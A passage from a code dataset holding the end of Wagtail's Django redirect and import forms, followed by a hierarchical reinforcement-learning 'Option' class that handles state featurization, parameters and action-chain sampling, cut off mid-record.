queryset=Site.objects.all(),\n required=False,\n empty_label=_(\"All sites\"),\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields[\"redirect_page\"].widget = AdminPageChooser()\n\n required_css_class = \"required\"\n\n def clean(self):\n \"\"\"\n The unique_together condition on the model is ignored if site is None, so need to\n check for duplicates manually\n \"\"\"\n cleaned_data = super().clean()\n\n if cleaned_data.get(\"site\") is None:\n old_path = cleaned_data.get(\"old_path\")\n if old_path is None:\n # cleaned_data['old_path'] is empty because it has already failed validation,\n # so don't bother with our duplicate test\n return\n\n old_path = Redirect.normalise_path(old_path)\n duplicates = Redirect.objects.filter(old_path=old_path, site__isnull=True)\n if self.instance.pk:\n duplicates = duplicates.exclude(id=self.instance.pk)\n\n if duplicates:\n raise forms.ValidationError(\n _(\"A redirect with this path already exists.\")\n )\n\n class Meta:\n model = Redirect\n fields = (\"old_path\", \"site\", \"is_permanent\", \"redirect_page\", \"redirect_link\")\n\n\nclass ImportForm(forms.Form):\n import_file = forms.FileField(\n label=_(\"File to import\"),\n )\n\n def __init__(self, allowed_extensions, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n accept = \",\".join([f\".{x}\" for x in allowed_extensions])\n self.fields[\"import_file\"].widget = forms.FileInput(attrs={\"accept\": accept})\n\n uppercased_extensions = [x.upper() for x in allowed_extensions]\n allowed_extensions_text = \", \".join(uppercased_extensions)\n help_text = _(\"Supported formats: %(supported_formats)s.\") % {\n \"supported_formats\": allowed_extensions_text,\n }\n self.fields[\"import_file\"].help_text = help_text\n\n\nclass ConfirmImportManagementForm(forms.Form):\n \"\"\"\n Store the import file name and input format in the form so that it can be used in the next step\n\n The initial values are signed, to prevent them from being tampered with.\n \"\"\"\n\n import_file_name = forms.CharField(widget=forms.HiddenInput())\n input_format = forms.CharField(widget=forms.HiddenInput())\n\n def __init__(self, *args, **kwargs):\n self.signer = Signer()\n initial = kwargs.get(\"initial\", {})\n for key in {\"import_file_name\", \"input_format\"}:\n if key in initial:\n # Sign initial data so it cannot be tampered with\n initial[key] = self.signer.sign(initial[key])\n super().__init__(*args, **kwargs)\n\n def clean(self):\n cleaned_data = super().clean()\n for key in {\"import_file_name\", \"input_format\"}:\n try:\n cleaned_data[key] = self.signer.unsign(cleaned_data[key])\n except BadSignature as e:\n raise forms.ValidationError(e.message)\n return cleaned_data\n\n\nclass ConfirmImportForm(ConfirmImportManagementForm):\n from_index = forms.ChoiceField(\n label=_(\"From field\"),\n choices=(),\n )\n to_index = forms.ChoiceField(\n label=_(\"To field\"),\n choices=(),\n )\n site = forms.ModelChoiceField(\n label=_(\"From site\"),\n queryset=Site.objects.all(),\n required=False,\n empty_label=_(\"All sites\"),\n )\n permanent = forms.BooleanField(initial=True, required=False)\n\n def __init__(self, headers, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n choices = []\n for i, f in enumerate(headers):\n choices.append([str(i), f])\n if len(headers) > 1:\n choices.insert(0, (\"\", \"---\"))\n\n self.fields[\"from_index\"].choices = choices\n self.fields[\"to_index\"].choices = choices\n","repo_name":"wagtail/wagtail","sub_path":"wagtail/contrib/redirects/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4338,"program_lang":"python","lang":"en","doc_type":"code","stars":16307,"dataset":"github-code","pt":"95"} +{"seq_id":"74370213433","text":"import numpy as np\r\nimport os, cv2, time, copy\r\nimport torch\r\nimport gym\r\nfrom Networks.network import pytorch_model\r\nfrom Networks.distributions import Bernoulli, Categorical, DiagGaussian\r\nfrom EnvironmentModels.environment_model import FeatureSelector, discretize_actions\r\nfrom tianshou.data import Batch, ReplayBuffer, to_torch_as, to_numpy\r\nfrom file_management import suppress_stdout_stderr\r\n\r\nINPUT_STATE = 0\r\nOUTPUT_STATE = 1\r\nPARAM_STATE = 2\r\nPARAM_NOINPUT_STATE = 3\r\nNO_PARAM_STATE = 4\r\nONLY_RELATIVE_STATE = 5\r\n\r\nFULL = 0\r\nFEATURIZED = 1\r\nDIFF = 2\r\n\r\n\r\nclass Option():\r\n def __init__(self, policy_reward, models, object_name, temp_ext=False, relative_actions = -1, relative_state=False, relative_param=0, \r\n discretize_acts=False, device=-1, param_first=False, no_input=False):\r\n '''\r\n policy_reward is a PolicyReward object, which contains the necessary components to run a policy\r\n models is a tuple of dataset model and environment model\r\n featurizers is Featurizers object, which contains the object name, the gamma features, the delta features, and a vector representing which features are contingent\r\n '''\r\n if policy_reward is not None:\r\n self.assign_policy_reward(policy_reward)\r\n else:\r\n self.discrete_actions = False\r\n if discretize_acts: # forces discrete actions\r\n self.discrete_actions = True \r\n self.assign_models(models)\r\n self.assign_featurizers()\r\n self.object_name = object_name\r\n print(\"init option\", self.object_name)\r\n self.action_shape = (1,) # should be set in subclass\r\n self.action_prob_shape = (1,) # should be set in subclass\r\n self.output_prob_shape = (1,) # set in subclass\r\n self.control_max = None # set in subclass, maximum values for the parameter\r\n self.action_max = None # set in subclass, the limits for actions that can be taken\r\n self.action_space = None # set in subclass, the space object corresponding to all of the above information\r\n self.relative_action_space = None # set in subclass, space object used to set actions relative to current position\r\n self.relative_actions = relative_actions > 0\r\n self.relative_state = relative_state\r\n self.relative_param = relative_param\r\n self.range_limiter = relative_actions\r\n self.discrete = False\r\n self.iscuda = False\r\n self.device = device\r\n self.use_mask = True\r\n self.param_process = None # must be assigned externally\r\n inp_set = PARAM_NOINPUT_STATE if no_input == 1 else (NO_PARAM_STATE if no_input == 2 else (ONLY_RELATIVE_STATE if no_input == 3 else PARAM_STATE))\r\n print(no_input, inp_set)\r\n # define different settings for get_state, a tuple of (form, inp, rel, param_rel)\r\n print(self.relative_state, self.relative_param)\r\n self.input_setting = (FEATURIZED, inp_set, int(self.relative_state), int(self.relative_param))\r\n self.inter_setting = (FEATURIZED, INPUT_STATE, 0, 0)\r\n self.output_setting = (FEATURIZED, OUTPUT_STATE, 0, 0)\r\n self.full_flat_setting = (FULL, 0,0,0)\r\n\r\n self.last_factor = self.get_state(setting=self.output_setting)\r\n self.last_act = None\r\n self.policy_batch = None # the policy batch for previous\r\n\r\n self.discretize_actions = discretize_acts # convert a continuous state into a discrete one\r\n # print(self.get_state(form=0))\r\n self.param_first = param_first\r\n self.inter_shape = self.get_state(setting=self.inter_setting).shape if not no_input else (0,)\r\n self.output_shape = self.get_state(setting=self.output_setting).shape\r\n self.object_shape = self.dataset_model.object_dim\r\n self.rel_shape = (0,) if not self.relative_state else self.get_relative(inp=INPUT_STATE).shape\r\n self.param_rel_shape = (0,) if not self.relative_param else self.output_shape\r\n print(self.get_state(setting=self.full_flat_setting))\r\n if self.sampler:\r\n self.param, self.mask = self.sampler.sample(self.get_state(setting=self.full_flat_setting))\r\n print(self.param)\r\n self.param_shape = self.param.shape\r\n else:\r\n self.param_shape = self.inter_shape\r\n self.param, self.mask = np.array([1]), np.array([1])\r\n print(self.inter_shape, self.output_shape, self.param_shape)\r\n self.input_shape = self.get_state(setting=self.input_setting).shape\r\n self.first_obj_shape = self.inter_shape[0] - self.output_shape[0] + self.param_shape[0] # TODO: assumes the output as part of the input\r\n \r\n\r\n\r\n # print(\"last_factor\", self.last_factor)\r\n # parameters for temporal extension TODO: move this to a single function\r\n self.temp_ext = temp_ext \r\n self.last_action = None\r\n self.terminated = True\r\n self.time_cutoff = -1 # time for ending the episode\r\n self.terminate_cutoff = -1 # cutoff for termination\r\n self.terminate_timer = 0 # tracking for terminating the current option parameter\r\n self.timer = 0 # tracking for end of episode\r\n self.resample_timer = 0 # tracking when the last resample was\r\n self.reward_timer = 0 # a hack to reduce the frequency of rewards\r\n self.reward_freq = 13\r\n\r\n def assign_models(self, models):\r\n self.dataset_model, self.environment_model, self.sampler = models\r\n\r\n def assign_policy_reward(self, policy_reward):\r\n self.policy = policy_reward.policy\r\n self.done_model = policy_reward.done_model\r\n self.termination = policy_reward.termination\r\n self.reward = policy_reward.reward # the reward function for this option\r\n self.next_option = policy_reward.next_option\r\n if self.next_option is not None:\r\n print(\"next option\", self.next_option.object_name, self.next_option.discrete)\r\n self.discrete_actions = self.next_option.discrete # the action space might be discrete even if the parameter space is continuous\r\n\r\n def assign_featurizers(self):\r\n self.gamma_featurizer = self.dataset_model.gamma\r\n self.delta_featurizer = self.dataset_model.delta\r\n self.contingent_input = self.dataset_model.controllable\r\n\r\n def set_device(self, device_no):\r\n device = 'cpu' if not self.iscuda else 'cuda:' + str(device_no)\r\n if self.policy is not None:\r\n self.policy.to(device)\r\n if self.dataset_model is not None:\r\n self.dataset_model.to(device)\r\n if self.next_option is not None:\r\n self.next_option.set_device(device_no)\r\n\r\n def cuda(self):\r\n self.iscuda = True\r\n if self.policy is not None:\r\n self.policy.cuda()\r\n if self.dataset_model is not None:\r\n self.dataset_model.cuda()\r\n if self.next_option is not None:\r\n self.next_option.cuda()\r\n\r\n def cpu(self):\r\n self.iscuda = False\r\n if self.policy is not None:\r\n self.policy.cpu()\r\n if self.dataset_model is not None:\r\n self.dataset_model.cpu()\r\n if self.next_option is not None:\r\n self.next_option.cpu()\r\n\r\n\r\n def get_relative(self, flat = None, factored=None, full_state=None, inp=0):\r\n state = flat\r\n if flat is None:\r\n if factored is None:\r\n if full_state is None:\r\n full_state = self.environment_model.get_state()\r\n factored_state = full_state['factored_state']\r\n flat = self.environment_model.flatten_factored_state(factored_state, instanced=True)\r\n base_shape = np.array(factored_state[list(factored_state.keys())[0]]).shape\r\n n_unsqueeze = len(base_shape) - 1\r\n for _ in range(n_unsqueeze):\r\n flat = np.expand_dims(flat, 0)\r\n state = flat\r\n else:\r\n state = factored\r\n featurize = self.gamma_featurizer if (inp == 0 or inp == 2 or inp == 3) else self.delta_featurizer\r\n rel = featurize.get_relative(state) # there might be some difficulty managing concatenate for relative state\r\n return rel\r\n \r\n # def get_flattened_input_state(self, factored_state):\r\n # return pytorch_model.wrap(self.environment_model.get_flattened_state(names=self.names), cuda=self.iscuda)\r\n def get_state(self, full_state=None, setting = (1,0,0,0), param=None, factored=False): # param is expected \r\n # form is an enumerator, 0 is flattened state, 1 is gamma/delta state, 2 is diff using last_factor\r\n # inp indicates if gamma or delta or gamma+param (if param is not None)\r\n # param can either be None (add a dummy param), a list of the same length as full_state, or a param dimensional numpy array\r\n # factored indicates if the state should NOT be flattened because only the factored components are given\r\n form, inp, rel, param_rel = setting\r\n if full_state is None:\r\n full_state = self.environment_model.get_state()\r\n if type(full_state) is list or type(full_state) is np.ndarray:\r\n # if type(param) is list or type(param) is np.ndarray:\r\n # return np.array([self.get_single_state(f, form=form, inp=inp, param=p) for f,p in zip(full_state, param)])\r\n if param is not None:\r\n return np.array([self.get_single_state(f, form=form, inp=inp, rel=rel, param_rel=param_rel, param=param.copy(), factored=factored) for f in full_state])\r\n return np.array([self.get_single_state(f, form=form, inp=inp, rel=rel, param_rel=param_rel, param=param, factored=factored) for f in full_state])\r\n else: # assume it is a dict\r\n return self.get_single_state(full_state, form=form, inp=inp, rel=rel, param_rel=param_rel, param=param, factored=factored)\r\n\r\n def get_single_state(self, full_state, form=1, inp=0, rel= 0, param_rel=0, param=None, factored=False):\r\n # print(full_state)\r\n factored_state = full_state['factored_state']\r\n featurize = self.gamma_featurizer if (inp == 0 or inp == 2) else self.delta_featurizer\r\n comb_param = lambda x: self.add_param(x, param) if (inp == 2 or inp == 3) else x\r\n\r\n if form == 0:\r\n return self.environment_model.flatten_factored_state(factored_state, instanced=True)\r\n elif form == 1:\r\n '''\r\n concatenation occurs in the order: relative, param, gamma, param\r\n '''\r\n # if inp == 2:\r\n # print(featurize(self.environment_model.flatten_factored_state(factored_state, instanced=True)), param)\r\n # print(\"getting combined\", comb_param(featurize(self.environment_model.flatten_factored_state(factored_state, instanced=True))))\r\n base_shape = np.array(factored_state[list(factored_state.keys())[0]]).shape\r\n n_unsqueeze = len(base_shape) - 1\r\n if not factored:\r\n flat = self.environment_model.flatten_factored_state(factored_state, instanced=True)\r\n # print(\"flat\", flat.shape, n_unsqueeze, base_shape, factored_state[\"Ball\"])\r\n for _ in range(n_unsqueeze):\r\n flat = np.expand_dims(flat, 0)\r\n if inp == 3 or inp == 5:\r\n if len(base_shape) == 1:\r\n state = comb_param(np.zeros((0,)))\r\n else:\r\n state = comb_param(np.zeros((base_shape[0],0,)))\r\n else:\r\n if factored:\r\n state = comb_param(featurize(factored_state))\r\n else:\r\n # flat = self.environment_model.flatten_factored_state(factored_state, instanced=True)\r\n # # print(\"flat\", flat.shape, n_unsqueeze, base_shape, factored_state[\"Ball\"])\r\n # for _ in range(n_unsqueeze):\r\n # flat = np.expand_dims(flat, 0)\r\n state = comb_param(featurize(flat))\r\n # print(state.shape)\r\n # print(\"cat param\", state.shape, rel)\r\n if rel == 1:\r\n if factored:\r\n rel = self.get_relative(factored=factored_state, inp=inp)\r\n else:\r\n rel = self.get_relative(flat=flat, inp=inp) # there might be some difficulty managing concatenate for relative state\r\n if len(state.shape) == 1:\r\n state = np.concatenate((rel, state), axis=0)\r\n else:\r\n state = np.concatenate((rel, state), axis=1)\r\n if param_rel > 0: # TODO: add mask to relative param\r\n # print(factored_state)\r\n if factored:\r\n os = self.delta_featurizer(factored_state)\r\n else:\r\n os = self.delta_featurizer(flat)\r\n # print(os, param)\r\n param = self.handle_param(os, param)\r\n param_rel = os - param\r\n if len(state.shape) == 1:\r\n # print(state.shape, param_rel.shape)\r\n state = np.concatenate((param_rel, state), axis=0)\r\n else:\r\n state = np.concatenate((param_rel, state), axis=1)\r\n # print(\"cat rel\", rel.shape, state.shape)\r\n return state\r\n else:\r\n return self.delta_featurizer(self.environment_model.flatten_factored_state(factored_state, instanced=True)) - self.last_factor\r\n\r\n def strip_param(self, combined):\r\n '''\r\n TODO: only handles stripping concatenated state with one dimension\r\n TODO: name is slightly confusing, strips BOTH param and relative states\r\n '''\r\n if self.param_process is None: # param process is not none would mean that the environment handles things like this\r\n if len(combined.shape) > 1:\r\n if self.param_first:\r\n return combined[:, self.param_shape[0]:]\r\n return combined[:, self.rel_shape[0] + self.param_rel_shape[0]:self.inter_shape[0] + self.rel_shape[0] + self.param_rel_shape[0]]\r\n if self.param_first:\r\n return combined[self.param_shape[0]:]\r\n return combined[self.rel_shape[0] + self.param_rel_shape[0]:self.inter_shape[0] + self.rel_shape[0] + self.param_rel_shape[0]]\r\n return combined\r\n\r\n def assign_param(self, state, param, obj_state=None):\r\n '''\r\n similar to add_param, but for a state which is already added\r\n TODO: assumes that param_process is an inplace operation\r\n '''\r\n if len(param.shape) != len(state.shape): # assume that state is batch and param is single\r\n param = np.stack([param.copy() for i in range(state.shape[0])], axis=0)\r\n if self.param_process is None:\r\n # print(state.shape, param.shape, self.inter_shape, self.rel_shape, self.relative_state)\r\n inter_rel = self.inter_shape[0] + self.rel_shape[0]\r\n prel = self.param_rel_shape[0]\r\n if len(state.shape) == 1:\r\n if self.param_first: # param is at the beginning\r\n state[:self.param_shape[0]] = param\r\n inter_rel += self.param_shape[0]\r\n else: # param is at the end\r\n state[inter_rel + prel:] = param\r\n if self.param_rel_shape[0] > 0 and obj_state is not None:\r\n state[inter_rel:inter_rel + prel] = obj_state - param \r\n else:\r\n if self.param_first:\r\n state[:, :self.param_shape[0]] = param\r\n inter_rel += self.param_shape[0]\r\n else:\r\n state[:, self.inter_shape[0] + self.rel_shape[0] + self.param_rel_shape[0]:] = param # default to was concatenated\r\n if self.param_rel_shape[0] > 0 and obj_state is not None:\r\n state[:, inter_rel:inter_rel + prel] = obj_state - param \r\n else:\r\n state = self.param_process(state, param)\r\n return state\r\n\r\n def handle_param(self, state, param):\r\n if param is None: # insert a dummy param\r\n param = np.zeros(self.param_shape)\r\n if len(param.shape) != len(state.shape): # assume that state is batch and param is single\r\n param = np.stack([param.copy() for i in range(state.shape[0])], axis=0)\r\n return param \r\n\r\n def add_param(self, state, param):\r\n '''\r\n only handles single states and batches\r\n '''\r\n param = self.handle_param(state, param)\r\n # if param is None: # insert a dummy param\r\n # param = np.zeros(self.param_shape)\r\n # if len(param.shape) != len(state.shape): # assume that state is batch and param is single\r\n # param = np.stack([param.copy() for i in range(state.shape[0])], axis=0)\r\n if self.param_process is None:\r\n if len(state.shape) == 1:\r\n param_process = lambda x,y: np.concatenate((x,y), axis=0)\r\n else:\r\n param_process = lambda x,y: np.concatenate((x,y), axis=1) # default to concatenate\r\n else:\r\n param_process = self.param_process\r\n if self.param_first:\r\n return param_process(param, state)\r\n return param_process(state, param)\r\n\r\n def get_param(self, full_state, last_terminate, force=False):\r\n # print(self.timer, last_terminate)\r\n new_param = False\r\n if last_terminate or self.timer == 0 or force or self.terminate_timer == self.terminate_cutoff:\r\n # print(\"resample\")\r\n self.terminate_timer = 0\r\n if self.object_name == 'Raw': # raw param handling is questionable at best\r\n self.param, self.mask = np.array([1]), np.array([1])\r\n else: \r\n self.param, self.mask = self.sampler.sample(self.get_state(full_state, setting=self.full_flat_setting))\r\n self.terminate_timer = 0\r\n new_param = True\r\n # print(self.param, self.get_state(full_state, form=FEATURIZED, inp=OUTPUT_STATE))\r\n self.param, self.mask = pytorch_model.unwrap(self.param), pytorch_model.unwrap(self.mask)\r\n # print(self.timer, self.time_cutoff, self.param, self.get_state(full_state, form=FEATURIZED, inp=OUTPUT_STATE))\r\n return self.param, self.mask, new_param\r\n\r\n def convert_param(self, param): # TODO: only handles single params at a time\r\n if self.discrete:\r\n if type(param) == np.ndarray: param = int(param.squeeze())\r\n if type(param) == torch.tensor: param = param.squeeze().long()\r\n return self.get_possible_parameters()[param][0]\r\n else:\r\n if self.object_name == \"Action\":\r\n mask = self.action_mask\r\n else:\r\n mask = self.dataset_model.get_active_mask()\r\n new_param = (mask.copy())\r\n param = param.squeeze()\r\n # print(mask, new_param, param)\r\n new_param[new_param == 1] = param\r\n param = new_param\r\n return param\r\n\r\n def convert_relative_action(self, state, act):\r\n # print(\"act\", act)\r\n if self.relative_actions:\r\n new_act = list()\r\n for a, cfs in zip(act, self.next_option.dataset_model.cfselectors):\r\n cfs.feature_selector(state) + a\r\n new_act.append(min(cfs.feature_range[1], max(cfs.feature_range[0], (cfs.feature_selector(state) + a).squeeze()))) # add the action, then constrain to the range\r\n # print(\"new_act\", new_act, cfs.feature_selector(state), a, cfs.feature_range)\r\n return np.array(new_act)\r\n return new_act\r\n\r\n def reverse_relative_action(self, state, act):\r\n # print(\"act\", act)\r\n new_act = list()\r\n for a, cfs in zip(act, self.next_option.dataset_model.cfselectors):\r\n new_act.append(cfs.feature_selector(state) - a)\r\n # new_act.append(min(cfs.feature_range[1], max(cfs.feature_range[0], (cfs.feature_selector(state) + a).squeeze()))) # add the action, then constrain to the range\r\n # print(\"new_act\", new_act, cfs.feature_selector(state), a, cfs.feature_range)\r\n return np.array(new_act)\r\n\r\n\r\n def map_action(self, act, resampled, batch):\r\n if self.discretize_actions: # if actions are discretized, then converts discrete action to continuous\r\n act = self.get_cont(act)\r\n act = self.policy.map_action(act) # usually converts from policy space to environment space (even for options)\r\n if self.relative_actions and self.next_option is not None and self.next_option.object_name != \"Action\": # converts relative actions maintaining value\r\n if resampled:\r\n act = self.convert_relative_action(self.next_option.get_state(batch[\"full_state\"], setting=self.full_flat_setting), act)\r\n self.last_mapped_act = act\r\n else:\r\n act = self.last_mapped_act # otherwise we get a moving target problem\r\n return act\r\n\r\n def reverse_map_action(self, mapped_act, batch):\r\n if self.relative_actions and self.next_option is not None and self.next_option.object_name != \"Action\": # converts relative actions maintaining value\r\n mapped_act = self.reverse_relative_action(self.next_option.get_state(batch[\"full_state\"], setting=self.full_flat_setting), mapped_act)\r\n act = self.policy.reverse_map_action(mapped_act) # usually converts from policy space to environment space (even for options)\r\n if self.discretize_actions: # if actions are discretized, then converts discrete action to continuous\r\n act = self.get_discrete(act)\r\n return act\r\n\r\n\r\n def sample_action_chain(self, batch, state_chain, random=False, force=False, use_model=False, preserve=False): # TODO: change this to match the TS parameter format, in particular, make sure that forward returns the desired components in RLOutput\r\n '''\r\n takes in a tianshou.data.Batch object and param, and runs the policy on it\r\n the batch object can only contain a single full state (computes one state at a time), because of handling issues\r\n use_model is only for model based search\r\n if the batch object contains a partial flag (key with PARTIAL=1), then treat the state as a partial\r\n '''\r\n # compute policy information for next state\r\n # input_state = self.get_state(state, form=FEATURIZED, inp=INPUT_STATE)\r\n\r\n resampled = True\r\n # if self.object_name == \"Ball\":\r\n # print(\"resample_check\", not (self.timer % self.temp_ext == 0 and self.timer != 0), # using temporal extension\r\n # (self.timer), # temporal extension timer ellapsed\r\n # (self.next_option is not None and not self.next_option.terminated), # waiting for next option termination \r\n # not force) # forces a new action\r\n\r\n # print(self.object_name, self.next_option.terminated)\r\n factored = False # This is really only used for the model based method\r\n # print(batch)\r\n if \"PARTIAL\" in batch[\"full_state\"] and batch[\"full_state\"][\"PARTIAL\"] == 1:\r\n # print(\"using factored\")\r\n factored = True\r\n if preserve or (self.temp_ext > 0 and # just force it to preserve the action, and using temporal extension\r\n (not (self.resample_timer == self.temp_ext)) and # temporal extension timer ellapsed\r\n (self.next_option is not None and not self.next_option.terminated) # waiting for next option termination \r\n and not force): # forces a new action\r\n # if self.object_name == \"Block\":\r\n # print(\"last action\", self.object_name, type(self.last_act), self.last_action)\r\n act = self.last_act # the baction is the discrete index of the action, where the action is the parameterized form that is a parameter\r\n mapped_act = self.last_action\r\n if state_chain is None: state = None\r\n else: state = state_chain[-1] \r\n policy_batch = self.policy_batch\r\n resampled = False\r\n elif random:\r\n # if self.relative_actions and self.next_option is not None and self.next_option.object_name != \"Action\": # only on higher level options\r\n # act = self.relative_action_space.sample()\r\n # act = self.convert_relative_action(self.next_option.get_state(batch[\"full_state\"], form=0, inp=1), act)\r\n # else:\r\n act = self.policy_action_space.sample()\r\n if hasattr(self, \"expand_policy_space\") and self.expand_policy_space and (type(act) == np.int64 or type(act) == int):\r\n act = np.array([act])\r\n # if self.policy\r\n policy_batch = None\r\n state = None\r\n mapped_act = self.map_action(act, resampled, batch)\r\n # if self.object_name == \"Block\":\r\n # print(\"random\", self.object_name, type(act), mapped_act)\r\n # print(\"random action\", mapped_act)\r\n else:\r\n # batch['obs'] = self.get_state(batch['full_state'], form=FEATURIZED, inp=INPUT_STATE)\r\n # batch['next_obs'] = self.get_state(batch['next_full_state'], form=FEATURIZED, inp=INPUT_STATE) if 'next_full_state' in batch else None\r\n # print(self.object_name, self.iscuda)\r\n # print(batch)\r\n if state_chain is None: policy_batch = self.policy.forward(batch, None)\r\n else: policy_batch = self.policy.forward(batch, state_chain[-1]) # uncomment this\r\n state = policy_batch['state']\r\n act = policy_batch.act\r\n act = to_numpy(act)\r\n # print(\"prenoise\", act)\r\n act = self.policy.exploration_noise(act, batch)\r\n act = act[0]\r\n # print(self.object_name, batch.obs, batch.obs_next, batch.param, act, mapped_act, self.convert_relative_action(self.next_option.get_state(batch[\"full_state\"], form=0, inp=1), act) if self.relative_actions and self.next_option is not None and self.next_option.object_name != \"Action\" else 0)\r\n # print(self.object_name, batch.obs, act)\r\n # print(\"relative\", act)\r\n if hasattr(self, \"expand_policy_space\") and self.expand_policy_space and (type(act) == np.int64 or type(act) == int):\r\n # print(\"expanding\")\r\n act = np.array([act])\r\n # print(type(act), act)\r\n mapped_act = self.map_action(act, resampled, batch)\r\n if self.object_name == \"Block\":\r\n print(act, mapped_act)\r\n # if self.object_name == \"Block\":\r\n # print(\"policy action\", self.object_name, type(act), mapped_act)\r\n if use_model: \r\n self.last_act = act # the baction is the discrete index of the action, where the action is the parameterized form that is a parameter\r\n self.last_action = mapped_act\r\n self.policy_batch = policy_batch\r\n act, mapped_act = self.search(batch, state_chain, act, mapped_act) # only this line differs from the main\r\n if resampled: self.resample_timer = 0\r\n # print(self.iscuda, param, baction, action)\r\n # print(act, random, mapped_act)\r\n # print(\"output actions\", act, mapped_act)\r\n chain = [mapped_act]\r\n \r\n # recursively propagate action up the chain\r\n if self.next_option is not None:\r\n param = batch['param']\r\n obs = batch['obs']\r\n param_act = self.next_option.convert_param(mapped_act)\r\n batch['param'] = [param_act]\r\n if self.next_option.object_name != \"Action\": batch['obs'] = self.next_option.get_state(batch[\"full_state\"], setting=self.next_option.input_setting, param=param_act, factored=factored) # will always concatenate param\r\n # print(\"params\", self.next_option.object_name, batch.param, param_act, param, batch.obs)\r\n # print(self.next_option.object_name, batch.obs)\r\n if state_chain is None: next_policy_act, rem_chain, result, rem_state_chain, last_resampled = self.next_option.sample_action_chain(batch, None) # , random=random # TODO: only sample top level randomly\r\n else: next_policy_act, rem_chain, result, rem_state_chain, last_resampled = self.next_option.sample_action_chain(batch, state_chain[:-1], force=resampled) # , random=random # TODO: only sample top level randomly, if we resampled make sure not to temporally extend the next layer\r\n chain = rem_chain + chain\r\n state = rem_state_chain + [state]\r\n batch['param'] = param\r\n batch['obs'] = obs\r\n self.policy_batch = policy_batch\r\n self.last_act = act\r\n # print(act, self.last_act, self.last_action)\r\n return act, chain, policy_batch, state, resampled\r\n\r\n def step(self, last_state, chain):\r\n # This can only be called once per time step because the state diffs are managed here\r\n if self.next_option is not None:\r\n self.next_option.step(last_state, chain[:len(chain)-1])\r\n self.last_action = chain[-1]\r\n self.last_factor = self.get_state(last_state, setting=self.output_setting)\r\n\r\n def step_timer(self, done): # TODO: does this need to handle done chains?\r\n # return true if the timer ellapsed\r\n self.timer += 1\r\n self.resample_timer += 1\r\n self.terminate_timer += 1\r\n # print(done, self.timer)\r\n if done or (self.timer == self.time_cutoff and self.time_cutoff > 0): # all timers reset if end of episode\r\n self.timer = 0\r\n self.terminate_timer = 0\r\n self.resample_timer = 0\r\n return self.timer == self.time_cutoff and self.time_cutoff > 0\r\n return False\r\n\r\n def terminate_reward(self, state, next_state, param, chain, mask=None, needs_reward=True):\r\n # recursively get all of the dones and rewards\r\n if self.next_option is not None: # lower levels should have masks the same as the active mask( fully trained)\r\n last_dones, last_rewards, last_termination = self.next_option.terminate_reward(state, next_state, self.next_option.convert_param(chain[-1]), chain[:len(chain)-1], needs_reward=False)\r\n # get the state to be entered into the termination check\r\n input_state = self.get_state(state, setting=self.inter_setting)\r\n object_state = self.get_state(next_state, setting=self.output_setting)\r\n # object_state = self.get_state(state, form = DIFF if self.data.use_diff else FEATURIZED, inp=OUTPUT_STATE) # don't predict diff state\r\n # if mask is None:\r\n # mask = self.dataset_model.get_active_mask()\r\n\r\n # assign terminated, done and reward ( might need to unwrap)\r\n # print(\"first\", object_state.shape, self.mask, param, input_state.shape)\r\n # print(self.environment_model.get_done(state), self.environment_model.get_done(next_state))\r\n # print(self.mask)\r\n termination = self.termination.check(input_state, object_state, param, self.mask, self.environment_model.get_done(next_state))\r\n # print(\"reward fn\", self.reward)\r\n if needs_reward:\r\n reward = self.reward.get_reward(input_state, object_state, param, self.mask, self.environment_model.get_reward(next_state))\r\n else:\r\n reward = 0\r\n self.terminated = termination\r\n self.done = self.done_model.check(termination, self.timer, self.environment_model.get_done(next_state))\r\n # print(\"checking\", termination, self.timer, self.done, self.termination.epsilon, self.object_name, self.termination.inter, self.termination.inter_pred)\r\n # done = op_done\r\n # # environment termination overrides\r\n # if self.environment_model.get_done(next_state):\r\n # # print(\"true_termination\")\r\n # done = True\r\n # # print(self.environment_model.get_done(state), done)\r\n # # manage a maximum time duration to run an option, NOT used, quietly switches option\r\n # if self.time_cutoff > 0:\r\n # if self.timer == self.time_cutoff - 1:\r\n # # print(\"timer termination\")\r\n # done = True\r\n dones = last_dones + [self.done]\r\n rewards = last_rewards + [reward]\r\n terminations = last_termination + [termination]\r\n # print(self.object_name, done, op_done, reward, object_state, param)\r\n return dones, rewards, terminations\r\n\r\n def tensor_state(self, factored_state): #TODO: this doesn't really belong here\r\n # might need to copy factored state\r\n for k in factored_state.keys():\r\n factored_state[k] = pytorch_model.wrap(factored_state[k], cuda = self.iscuda)\r\n if len(factored_state[k].shape) > 1: # flattens only up to one extra dimension\r\n factored_state[k] = factored_state[k][0]\r\n return factored_state\r\n\r\n def np_state(self, factored_state): #TODO: this doesn't really belong here\r\n for k in factored_state.keys():\r\n factored_state[k] = pytorch_model.unwrap(factored_state[k])\r\n if len(factored_state[k].shape) > 1: # flattens only up to one extra dimension\r\n factored_state[k] = factored_state[k][0]\r\n return factored_state\r\n\r\n\r\n def predict_state(self, factored_state, raw_action):\r\n # predict the next factored state given the action chain\r\n # This is different only at the primitive-option level, where the state of the Action is used from the environment model\r\n factored_state = self.tensor_state(factored_state)\r\n inters, new_factored_state = self.next_option.predict_state(factored_state, raw_action)\r\n if self.next_option.object_name == \"Action\": # special handling of actions, which are evaluated IN BETWEEN states\r\n factored_state[\"Action\"] = new_factored_state[\"Action\"] \r\n inter, next_state = self.dataset_model.predict_next_state(factored_state) # uses the mean, no variance\r\n return inters + [inter], {**new_factored_state, **{self.object_name: next_state}}\r\n\r\n\r\n # def record_state(self, state, next_state, action_chain, rl_outputs, param, rewards, dones):\r\n # if self.next_option is not None:\r\n # self.next_option.record_state(state, next_state, action_chain[:-1], rl_outputs[:-1], action_chain[-1], rewards[:-1], dones[:-1])\r\n # self.rollouts.append(**self.get_state_dict(state, next_state, action_chain, rl_outputs, param, rewards, dones))\r\n\r\n # def get_state_dict(self, state, next_state, action_chain, rl_outputs, param, rewards, dones, terminations): # also used in HER\r\n # return {'state': self.get_state(state, form=FEATURIZED, inp=INPUT_STATE),\r\n # 'next_state': self.get_state(next_state, form=FEATURIZED, inp=INPUT_STATE),\r\n # 'object_state': self.get_state(state, form=FEATURIZED, inp=OUTPUT_STATE),\r\n # 'next_object_state': self.get_state(next_state, form=FEATURIZED, inp=OUTPUT_STATE),\r\n # 'state_diff': self.get_state(state, form=DIFF, inp=OUTPUT_STATE), \r\n # 'true_action': action_chain[0],\r\n # 'true_reward': rewards[0],\r\n # 'true_done': 